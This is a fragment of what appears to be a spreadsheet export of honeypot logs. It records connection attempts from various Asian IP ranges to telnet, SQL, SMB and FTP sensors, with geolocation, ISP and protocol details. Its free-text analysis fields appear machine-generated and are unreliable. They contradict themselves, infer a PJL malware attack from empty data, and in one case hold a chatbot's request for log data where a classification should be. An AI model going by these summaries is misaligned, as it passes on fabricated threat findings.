    <s v="Orange Espagne SA"/>
    <s v="Orange Spain"/>
    <s v="business"/>
    <s v="Jazztel triple play services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:57dd:30df"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="595"/>
    <x v="595"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:10:43"/>
    <d v="2024-12-24T07:56:29"/>
    <d v="2025-04-28T10:10:43"/>
    <n v="247"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3a7e:6c43"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates that there is no available data to analyze at this time, so no malicious activity can be inferred from it. &amp;&amp; No telnet connection attempt detected, indicating possibly normal system operation or idle state with no malicious activity. &amp;&amp; No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="596"/>
    <x v="596"/>
    <s v="171.123.168.184.host.secureserver.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:10:10"/>
    <d v="2024-04-14T14:48:20"/>
    <d v="2025-04-28T10:10:10"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;62786&amp;&amp;1433&amp;&amp;36440&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-0001"/>
    <s v="35.694"/>
    <s v="139.754"/>
    <s v="26496"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="hosting"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b8a8:7bab"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="597"/>
    <x v="597"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T10:01:41"/>
    <d v="2025-04-28T10:01:41"/>
    <d v="2025-04-28T10:01:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:15da"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET connection was made during this time period, but it's possible that an attacker attempted to connect or scan for a vulnerable service. The lack of activity might indicate the attackers were deterred by security measures. This could be indicative of reconnaissance activities from potential malicious actors. &amp;&amp; No activity detected for TELNET service, indicating no malicious connections attempted via this protocol. _x000a_Normal behavior expected here as there is no incoming traffic recorded. _x000a_ Service status appears to be idle."/>
    <s v="Telnet Attack"/>
  </r>
  <r>
    <x v="598"/>
    <x v="598"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T09:34:50"/>
    <d v="2025-04-28T09:34:50"/>
    <d v="2025-04-28T09:34:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:4c5a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="599"/>
    <x v="599"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T09:11:31"/>
    <d v="2025-02-17T13:07:38"/>
    <d v="2025-04-28T09:11:31"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Bucheon-si"/>
    <s v="Bucheon-si (Wonmi-gu)"/>
    <s v="1838716"/>
    <s v="NA"/>
    <s v="37.5064"/>
    <s v="126.803"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Sudogwonseobubonbu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79ad:1e26"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No available log data provided. &amp;&amp; This log indicates a failed attempt to use PJL (Print Job Language) for malicious purposes, potentially leading to unauthorized access or disruption of print services. The activity is likely a reconnaissance probe or an attack vector targeting printer systems. This behavior is indicative of a potential print-based malware delivery mechanism or lateral movement exploit."/>
    <s v="I need some log data to analyze! Please provide the log data from the honeypot. I'll then classify the attacks based on their names and format, and give you a list of attack types with a short phrase (max 2 words) for each one._x000a__x000a_Once you provide the log data, I can proceed with the analysis."/>
  </r>
  <r>
    <x v="600"/>
    <x v="600"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T09:11:20"/>
    <d v="2023-08-22T17:07:10"/>
    <d v="2025-04-28T09:11:20"/>
    <n v="77"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;58369&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Dongjak-gu"/>
    <s v="Noryangjin-dong"/>
    <s v="6800117"/>
    <s v="156050"/>
    <s v="37.5116"/>
    <s v="126.942"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77c4:a8d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze potential malicious activity._x000a__x000a_(This is because the log data provided is &quot;NA&quot;, which stands for &quot;Not Available&quot; or &quot;No Data&quot;)"/>
    <m/>
  </r>
  <r>
    <x v="601"/>
    <x v="601"/>
    <s v="61-31-104-40.static.tfn.net.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-28T08:47:16"/>
    <d v="2023-09-13T00:50:57"/>
    <d v="2025-04-28T08:47:16"/>
    <n v="333445"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;80&amp;&amp;46710&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0501"/>
    <s v="121.565"/>
    <s v="9924"/>
    <s v="Taiwan Fixed Network, Telco and Network Service Provider."/>
    <s v="Taiwan Fixed Network"/>
    <s v="business"/>
    <s v="Taiwan Fixed Network CO., LTD."/>
    <s v="2002-04-02"/>
    <s v="TFN-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1999-04-26 15:56:18"/>
    <s v="2025-07-02 00:00:00"/>
    <s v="NA"/>
    <s v="dns2.tfn.net.tw     211.78.215.200 _x000a_      dns1.tfn.net.tw     211.78.215.137"/>
    <s v="TWNIC"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d1f:6828"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No malicious activity detected, likely due to lack of interaction or failed connection attempt via TELNET service. The log indicates no traffic was received for the service, suggesting it remains idle. No security concern is raised by this entry."/>
    <m/>
  </r>
  <r>
    <x v="602"/>
    <x v="602"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T08:01:53"/>
    <d v="2025-04-11T16:47:31"/>
    <d v="2025-04-28T08:01:53"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:efd:7c8c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No connection attempt detected from MySQL service. &amp;&amp; No malicious activity detected, as no connection was attempted to MSSQL service. Service is presumably inactive or not targeted. No attempt made to exploit the service."/>
    <m/>
  </r>
  <r>
    <x v="603"/>
    <x v="603"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T07:46:13"/>
    <d v="2025-04-28T07:46:13"/>
    <d v="2025-04-28T07:46:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Dharmapuri"/>
    <s v="Dharmapuri (Lakkiampatty)"/>
    <s v="1272847"/>
    <s v="636701"/>
    <s v="12.1152"/>
    <s v="78.1528"/>
    <s v="151686"/>
    <s v="VEDINIRMALA-AS-IN"/>
    <s v="Vedinirmala Broadband PVT LTD"/>
    <s v="consumer"/>
    <s v="Vedinirmala Broadband PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675a:267a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="604"/>
    <x v="604"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T07:11:51"/>
    <d v="2025-04-08T20:57:10"/>
    <d v="2025-04-28T07:11:51"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="21&amp;&amp;8443&amp;&amp;NA&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore"/>
    <s v="1880252"/>
    <s v="NA"/>
    <s v="1.35208"/>
    <s v="103.82"/>
    <s v="45102"/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="hosting"/>
    <s v="Alibaba.com LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/json,application/xhtml+xml, application/xml;q=0.9, */*;q=0.8', 'Accept-Encoding': 'deflate, gzip', 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'deflate, gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'curl/7.75.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2fec:b5fa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="605"/>
    <x v="605"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T07:01:16"/>
    <d v="2024-05-07T22:22:00"/>
    <d v="2025-04-28T07:01:16"/>
    <n v="155"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;60157&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18559"/>
    <s v="106.823"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="LINTASARTA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="LINTASARTA-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,60077)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,61584)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,7908)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,9451)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,17867)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,5129)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,6645)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,26991)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,29338)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,55900)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,58029)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,64230)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,5654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,43444)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,45799)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39126)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39721)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,41099)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,42739)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,6505)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,7807)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,39523)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,53475)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,54311)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,63247)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,64939)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,22621)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,24249)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,11346)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,12295)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,51628)}&amp;&amp;{Data_SMB:Incoming connection (123.231.151.154,52742)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7be7:979a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
